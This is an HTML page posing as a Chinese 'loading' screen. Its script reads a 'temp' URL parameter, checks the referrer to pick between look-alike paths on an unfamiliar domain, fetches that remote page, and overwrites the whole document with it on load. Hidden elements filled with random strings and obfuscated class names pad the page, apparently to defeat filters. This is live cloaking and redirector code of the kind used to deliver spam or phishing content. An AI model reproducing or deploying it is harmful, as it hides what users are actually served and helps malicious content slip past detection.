<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Vatc20GCr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Vatc20GCr .RiLKK3Y0n9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Vatc20GCr .content {
            line-height: 50px;
            text-align: center
        }

        .Vatc20GCr .img {
            width: 100%
        }

        .Vatc20GCr .KKk04k1 {
            text-align: center
        }

        .Vatc20GCr .KKk04k1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Vatc20GCr .KKk04k1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Vatc20GCr .KKk04k1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Vatc20GCr .KKk04k1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Vatc20GCr .KKk04k1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Vatc20GCr .KKk04k1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Vatc20GCr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KiyYGOXnyGt0j(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cQ2IhZ = KiyYGOXnyGt0j('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cQ2IhZ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cQ2IhZ +".html?a=share";
		}
		
        NY33Hf5SWd=url+"#"+new Date().getTime();
        NY33Hf5SWd && function() {
            $.get(NY33Hf5SWd, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<span style='display:none'>tTMKbywHy9w5gCG0I29kxRdl6</span>
<a  href='#' style='display:none'>q3zareTGTSxq5xQvHSct9uPWqdM4s6AWxDCk0fXc</a>
<span style='display:none'>tTMKbywHy9w5gCG0I29kxRdl6</span>
<img  src='' style='display:none'>
<h1 style='display:none' >YDR1krMnjL1Zhm54xWGAw0</h1>
<img  src='' style='display:none'>
<li style='display:none' >uERfkyppahCKSahW3m6dAhIi8SukIR167K3qbDQWaYiPOYCEToRe8W8Uki8HoTjHIrjbAZ6QgazHpJgn3</li><div class="Vatc20GCr">
    <div class="RiLKK3Y0n9">
        <div class="KKk04k1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>S9QAsAoNeDwpiT3w5entVZID4eVvlLJuu</p>
<ul style='display:none' >rmIKvojIiUDz4sv3QylPARrXr8aVMjaI4hFyOlgOgrF7bn</ul>
<span style='display:none'>oF9b7y4G3UQfi9WmAWkjXlip3IliKgHdc0B1SmDqsQKeyhr4dSen3hM7UfnyD</span>
<ul style='display:none' >rmIKvojIiUDz4sv3QylPARrXr8aVMjaI4hFyOlgOgrF7bn</ul>
<b style='display:none' >np7iROYVAmBghmPmqhOJW0tVlfVQEuiZsOKs4Bmac3jSz9nzYSVgsndxaggimSFhdGPl6uDkUD31E</b>
<b style='display:none' >np7iROYVAmBghmPmqhOJW0tVlfVQEuiZsOKs4Bmac3jSz9nzYSVgsndxaggimSFhdGPl6uDkUD31E</b></body>
</html>